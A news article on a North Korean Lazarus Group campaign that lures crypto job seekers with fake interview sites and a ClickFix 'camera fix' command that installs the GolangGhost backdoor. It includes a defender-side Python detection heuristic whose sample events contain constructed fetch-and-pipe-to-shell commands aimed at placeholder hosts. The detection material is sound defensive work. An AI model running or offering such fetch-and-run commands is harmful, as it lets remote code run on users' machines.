North Korean state-sponsored hackers, known collectively as the Lazarus Group, have launched a fresh wave of cyberattacks aimed at cryptocurrency developers. These sophisticated campaigns are now leveraging the ClickFix technique, a deceptive method designed to sneak malware onto victims’ devices under the guise of fake job interviews.
Lazarus Expands Its Crypto Crime Arsenal with ClickFix
Lazarus is no stranger to the crypto crime world. Over the past two years, this advanced persistent threat (APT) group has siphoned off nearly $2 billion in digital assets, including a massive $1.5 billion heist from UAE-based Bybit in March 2025 alone.
Historically, Lazarus has targeted individuals involved in the crypto industry, especially software developers. Previous operations—Dream Job, Contagious Interview, and DeceptiveDevelopment—all lured developers into fake recruitment traps. The latest campaign builds on that same formula but adds a new twist.
ClickFake Interview Campaign Imitates Top Crypto Firms
Dubbed ClickFake Interview, this recent wave of attacks appears to be a continuation of the Contagious Interview campaign that first emerged in 2022. It focuses on job seekers in the cryptocurrency field and deploys a Go-based backdoor named GolangGhost to infiltrate victims’ systems.
What makes ClickFake Interview particularly dangerous is its use of ClickFix, a technique that deceives users into installing malware under the pretense of fixing a camera error during a staged online interview.
Here’s How the ClickFix Attack Unfolds
The attack typically begins with a direct message on social media, inviting the target to an online interview for a high-profile job in crypto. The unsuspecting candidate is then directed to a well-crafted fake interview site, often impersonating reputable crypto firms like Coinbase, KuCoin, Ripple, Chainalysis, and Archblock.
Sekoia researchers uncovered 184 unique invitations tied to over a dozen forged websites—all sharing a consistent user interface built using ReactJS. Each page dynamically loads content and tailors the experience based on the fake job listing.
Once on the site, users are prompted to fill out contact details, answer questions, and use their webcam to record an introductory video. But when the candidate tries to enable the camera, an error message pops up, claiming a driver issue, and provides instructions to run a specific command in the Windows command prompt or macOS Terminal. This is the moment when the ClickFix technique is triggered.
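A defender-side illustration of the step described above, added here and not taken from Sekoia or the original article: a heuristic that flags commands typed into an interactive shell that both fetch remote content and run it in the same line. The regex patterns, the event fields (`id`, `shell`, `cmdline`) and every sample event are assumptions constructed for this example, since the article does not reproduce the actual command.

```python
import re

# Assumed heuristic: a pasted "fix" is a one-liner that fetches remote content
# and hands it to an interpreter in the same command. Patterns are illustrative.
FETCH = re.compile(r"\b(curl|wget|invoke-webrequest|iwr)\b[^|;&]*https?://", re.I)
RUN = re.compile(
    r"\|\s*(?:ba|z)?sh\b"      # output piped into a Unix shell
    r"|\|\s*iex\b"             # output piped into PowerShell Invoke-Expression
    r"|(?:&&|;|&)\s*(?:(?:ba|z)?sh|wscript|cscript|powershell|chmod\s+\+x)\b",
    re.I,
)
# Shells a person pastes into (the article names cmd and macOS Terminal).
INTERACTIVE = {"cmd.exe", "powershell.exe", "terminal", "zsh", "bash"}

def classify(event):
    """Return the reasons an event looks like a pasted fetch-and-run command."""
    if event["shell"].lower() not in INTERACTIVE:
        return []  # services and CI runners are out of scope for this check
    reasons = []
    if FETCH.search(event["cmdline"]):
        reasons.append("fetches remote content")
    if RUN.search(event["cmdline"]):
        reasons.append("runs fetched content")
    # Either signal alone is routine developer activity; require both.
    return reasons if len(reasons) == 2 else []

def scan(events):
    """Return (id, reasons) for every event that classify() flags."""
    return [(e["id"], classify(e)) for e in events if classify(e)]

# Constructed sample telemetry: hosts, URLs and file names are made up.
SAMPLE_EVENTS = [
    {"id": 1, "shell": "zsh",
     "cmdline": "curl -s https://driver-fix.example.invalid/cam.sh | bash"},
    {"id": 2, "shell": "cmd.exe",
     "cmdline": "curl -o %TEMP%\\fix.vbs https://driver-fix.example.invalid/fix.vbs"
                " && wscript %TEMP%\\fix.vbs"},
    {"id": 3, "shell": "zsh",   # download only, nothing executed
     "cmdline": "curl -O https://releases.example.invalid/tool-1.2.tar.gz"},
    {"id": 4, "shell": "zsh",   # local script, nothing fetched
     "cmdline": "git pull && sh ./build.sh"},
    {"id": 5, "shell": "ci-runner",  # automated, not a user pasting a command
     "cmdline": "curl -s https://get.example.invalid/install.sh | bash"},
]

if __name__ == "__main__":
    for event_id, reasons in scan(SAMPLE_EVENTS):
        print(event_id, reasons)
```

In practice a rule like this is a triage signal to pair with context, such as a browser session on an unfamiliar interview site shortly before the command ran.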
What Happens After the Malware Is Installed?
Following these steps leads to the silent installation of GolangGhost, a powerful backdoor malware. Once embedded, it grants Lazarus full access to the victim’s system, enabling the hackers to:
- Upload and download files
- Execute arbitrary shell commands
- Deploy a Chrome browser stealer
- Harvest detailed system information
What’s notable is that the job roles being offered aren’t even technical. According to Sekoia, most positions advertised involve non-technical titles like product manager, asset manager, or DeFi specialist, adding another layer of deception to the scheme.
Growing Threat to the Crypto Ecosystem
This operation underscores the evolving tactics of nation-state hackers. Lazarus continues to blend social engineering, technical manipulation, and brand impersonation to target individuals in the growing cryptocurrency workforce. The use of the ClickFix technique shows how these attackers are constantly refining their malware delivery strategies to bypass traditional defenses.
With the cryptocurrency job market still expanding, and remote interviews now the norm, more professionals could fall into similar traps—unless they stay alert to tactics like ClickFix.